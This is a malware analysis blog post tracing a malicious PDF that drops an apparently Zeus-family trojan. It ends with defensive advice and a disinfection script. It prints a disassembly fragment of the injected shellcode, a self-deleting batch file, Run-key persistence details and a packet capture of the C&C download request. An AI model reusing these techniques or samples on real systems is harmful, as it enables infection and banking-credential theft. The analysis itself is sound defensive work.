008904F9   FF55 2C          CALL DWORD PTR SS:[EBP+2C]
008904FC   81C4 04010000    ADD ESP,104
00890502   C3               RETN
00890503   90               NOP
00890504   90               NOP
00890505   58               POP EAX
00890506   FFD0             CALL EAX
00890508   FB               STI
00890509   D4 A2            AAM 0A2
0089050B   61               POPAD
0089050C   8A3C04           MOV BH,BYTE PTR SS:[ESP+EAX]
0089050F   4D               DEC EBP
00890510   4D               DEC EBP
00890511   B8 AFCCDD3B      MOV EAX,3BDDCCAF
00890516   99               CDQ
00890517   8620             XCHG BYTE PTR DS:[EAX],AH
00890519   8C48 62          MOV WORD PTR DS:[EAX+62],CS
0089051C   E1 72            LOOPDE SHORT 00890590
0089051E   D91B             FSTP DWORD PTR DS:[EBX]
00890520  ^E0 BC            LOOPDNE SHORT 008904DE
00890522   DE6C9B AE        FISUBR WORD PTR DS:[EBX+EBX*4-52]
00890526   9C               PUSHFD
00890527   D4 D0            AAM 0D0
00890529   2392 301A98BA    AND EDX,DWORD PTR DS:[EDX+BA981A30]
0089052F  ^73 C0            JNB SHORT 008904F1
00890531   2349 9C          AND ECX,DWORD PTR DS:[ECX-64]
00890534   D86D AD          FSUBR DWORD PTR SS:[EBP-53]
00890537   17               POP SS                                   ; Modification of segment register
00890538   FEC9             DEC CL
0089053A   AA               STOS BYTE PTR ES:[EDI]
0089053B   8546 6C          TEST DWORD PTR DS:[ESI+6C],EAX
0089053E   9A 2908830B A758 CALL FAR 58A7:0B830829                   ; Far call
00890545   64:2F            DAS                                      ; Superfluous prefix
00890547   1106             ADC DWORD PTR DS:[ESI],EAX
00890549   C2 9950          RETN 5099

Eventually, a jump to this code is being made.  (0x00890000)

In this code, the following things happen :

  • Get baseaddress of kernel32.dll
  • Get function ptrs to LoadLibraryA, GetModuleHandleA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, CloseHandle, CreateToolhelp32snapshot, Thread32First, Thread32Next, GetModuleFileNameA, CreateFileA, SetFilePointer, ReadFile, GetCurrentProcessId, OpenProcess, ReadProcessMemory
  • Get the current process ID call OpenProcess(), and call ReadProcessMemory()
  • Perform another VirtualAlloc
  • call GetModuleFileNameA (of kernel32.dll) and call CreateFileA (on kernel32.dll) (GENERIC_READ)
  • call setFilePointer, ReadFile and CloseHandle()
  • call GetModuleFileNameA (of flashplayer.exe) and call CreateFileA (read the flashplayer executable) (GENERIC_READ)
  • call setFilePointer, ReadFile and CloseHandle()
  • call CreateToolhelp32Snapshot, Thread32First, Thread32Next and CloseHandle()
  • call VirtualAlloc (ReadWrite, size 0) and VirtualProtect (Page_ReadWrite), 0x400 bytes)
  • …  (take a look yourself :) )

Basically, it injects code into explorer.exe and binds a socket to a random local port . BlackManta (a PyCommand for Immunity Debugger) reports this :

Send / Recv of infected explorer.exe:
++++++++++++++++++++++++++++++++++++

Send Buf Recv Buf

recv: s = "0x00000720", buf = "0x0146feae", bufLen = "0x00000001", flags = "0x00000000" 

accept (
s = "0x000003c8" 
addr = "0x00000000" 
addrlen = "0x00000000" 
)

recv: s = "0x000002d8", buf = "0x0146feae", bufLen = "0x00000001", flags = "0x00000000" 

accept (
s = "0x000003c8" 
addr = "0x00000000" 
addrlen = "0x00000000" 
)

recv: s = "0x00000724", buf = "0x0146feae", bufLen = "0x00000001", flags = "0x00000000" 

accept (
s = "0x000003c8" 
addr = "0x00000000" 
addrlen = "0x00000000" 
)

When sending data to the local port, the connection was interrupted right away.

It permanently infects the machine (in our sample, it writes a jpg file and renames it to voel.exe,but the name is totally random) by adding an entry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, pointing to the exe file. In the screenshot below, the file is called otdo.exe (but I’ll continue to refer to voel.exe, to indicate the file that gets created by the infection)

image

image

It also creates an entry under HKEY_CURRENT_USER\Software\Microsoft (again, random name) :

 image

 

The executable that is dropped onto the machine appears to display similar behaviour as "flashplayer.exe – it attempts to set up a connection to a C&C server and exchanges information.  Antivirus analysis of the .exe reports this :

File name:
voel.exe
Submission date:
2010-11-18 23:14:51 (UTC)
Current status:
queued (#5) queued analysing finished
Result:
8/ 43 (18.6%)

BitDefender 7.2 2010.11.18 Gen:Variant.Kazy.3578
DrWeb 5.0.2.03300 2010.11.18 Trojan.DownLoader.origin
F-Secure 9.0.16160.0 2010.11.18 Gen:Variant.Kazy.3578
GData 21 2010.11.18 Gen:Variant.Kazy.3578
NOD32 5631 2010.11.18 a variant of Win32/Kryptik.IGD
Panda 10.0.2.7 2010.11.18 Suspicious file
Prevx 3.0 2010.11.19 Medium Risk Malware
Sophos 4.59.0 2010.11.18 Mal/Zbot-AN

When the flashplayer payload ends, it attempts to cleans up by creating & executing a batchfile, which removes the flashplayer.exe executable and the batch file itself.

@echo off
:d
del "V:\price\flashplayer1.exe"
if exist "V:\price\flashplayer1.exe" goto d
del /F "C:\DOCUME~1\peter\LOCALS~1\Temp\tmp5f240451.bat"

So at this point, the machine is infected, and a file is dropped on the box (random name, stored in C:\Documents and Settings\\Application Data).  We have noticed that the infected explorer.exe process touches the executable on a regular basis. We are still documenting why it does that, and what it does exactly.

Next to the .exe file, a new folder (random filename) is created under "Application Data" as well, and a file .iqm is created.

To make things a bit more interesting, we decided to infect a few of our own boxes on purpose, and see what happens as the hacker/botnet/worm… accesses our boxes.  And yes, we had our sniffers all set.  We noticed some packets that included this :

0000 52 54 00 12 35 02 08 00 27 49 83 43 08 00 45 00 RT..5...'I.C..E.
0010 01 09 54 1e 40 00 80 06 f1 6e 0a 00 03 0f c9 08 ..T.@....n......
0020 de 4a 04 d5 00 50 f7 b3 b4 c9 07 65 8e 02 50 18 .J...P.....e..P.
0030 fa f0 d9 8b 00 00 47 45 54 20 2f 70 61 6e 65 6c ......GET /panel
0040 33 2f 70 70 6e 6c 33 2e 62 69 6e 20 48 54 54 50 3/ppnl3.bin HTTP
0050 2f 31 2e 31 0d 0a 41 63 63 65 70 74 3a 20 2a 2f /1.1..Accept: */
0060 2a 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 43 *..Connection: C
0070 6c 6f 73 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 lose..User-Agent
0080 3a 20 4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20 28 63 : Mozilla/4.0 (c
0090 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 20 ompatible; MSIE 
00a0 38 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e 54 20 8.0; Windows NT 
00b0 35 2e 31 3b 20 54 72 69 64 65 6e 74 2f 34 2e 30 5.1; Trident/4.0
00c0 3b 20 2e 4e 45 54 20 43 4c 52 20 32 2e 30 2e 35 ; .NET CLR 2.0.5
00d0 30 37 32 37 29 0d 0a 48 6f 73 74 3a 20 48 4b 4e 0727)..Host: HKN
00e0 57 63 39 6e 63 4d 45 68 51 62 4c 43 43 79 66 4c Wc9ncMEhQbLCCyfL
00f0 72 4d 39 4e 4b 52 2e 6e 65 74 0d 0a 43 61 63 68 rM9NKR.net..Cach
0100 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 e-Control: no-ca
0110 63 68 65 0d 0a 0d 0a che....

Based on the calls made to /panel3/ppnl3.bin and to /panel3/gotobank.php (https://zeustracker.abuse.ch/monitor.php?host=blindwife.net)  it looks like this is Zeus

Despite the fact that Zeus has been around for quite some time, AV vendors are still not able to pick it up (most likely because Zeus = business = money = smart)

procmon reports this when voel.exe executes :

image

(You can download the entire procmon file here :http://redmine.corelan.be:8800/projects/corelan-public/files )

Apparently, voel.exe connects to a C&C server, attempts to downloads .bin files.  It first tries to resolve google.com / fryloop.net and then initiates the outbound connections. On some systems it connected right away, on other systems, we did not see outbound connections, so perhaps it’s using a random delay before connecting.

We also discovered that, if you remove voel.exe from your system & reboot, the system does not "phone home" anymore.


If you want to play with the pdf file yourself, you can download a copy here : http://redmine.corelan.be:8800/projects/corelan-public/files

 

Stay tuned for more information about voel.exe

 

Protect yourself

  • Inform users to never open attachments or click links from emails they didn’t expect (even if they know the sender) and simply ask them to open a file or go to a url.
  • Disable javascript in Acrobat Reader (or avoid using Acrobat Reader altogether)
  • Block all access to fryloop.net (keep in mind, however, that nothing prevents the senders to use different url’s to host the payload)  (You could consider creating a zone for fryloop.net in your local DNS and point it to 127.0.0.1, or block access on your proxy / web filtering gateways)
  • Block incoming small zip files on your email gateways

 

Detect, Desinfect & Clean up

In the event that you got infected after all, and your Antivirus didn’t catch the infection, then you can use our little script to clean up an infected machine.  The script will attempt to detect the infection and will prompt you to remove files from the filesystem an entries from the registry. After the first run, you should reboot the machine, and then run the script again immediately after it has rebooted.

This reboot is needed because the infected explorer.exe process will attempt to keep the entry in the registry.  So at the first run, the infected files will be deleted. This will make sure the machine does not get re-infected after the reboot.  During the second run, the registry keys are deleted as well.

Note that the utility will only remove the infection from the currently logged on user profile.  After all, the infection is user bound, not machine bound.

You can get a copy of the desinfection script here : http://redmine.corelan.be:8800/projects/corelan-public/files

This is how the script works :

Corelan Team price.pdf detection & desinfection script

or click here to watch the video on youtube.com

Note : you can convert the python script to a standalone executable using py2exe

 

 

Thanks to

  • Obzy, Sud0, Fancy : for joining me in analysing & reversing the payload
  • the other Corelan Team members, for being such a great bunch of guys to work with !

 


  Copyright secured by Digiprove © 2010 Peter Van Eeckhoutte

© 2010 – 2021, Peter Van Eeckhoutte (corelanc0d3r). All rights reserved.

6 Responses to Malicious pdf analysis : from price.zip to flashplayer.exe

Corelan Training

We have been teaching our win32 exploit dev classes at various security cons and private companies & organizations since 2011

Check out our schedules page here and sign up for one of our classes now!

Donate

Want to support the Corelan Team community ? Click here to go to our donations page.

Want to donate BTC to Corelan Team?



Your donation will help funding server hosting.

Corelan Team Merchandise

You can support Corelan Team by donating or purchasing items from the official Corelan Team merchandising store.

Protected by Copyscape Web Plagiarism Tool

Corelan on Slack

You can chat with us and our friends on our Slack workspace:

  • Go to our facebook page
  • Browse through the posts and find the invite to Slack
  • Use the invite to access our Slack workspace
  • Categories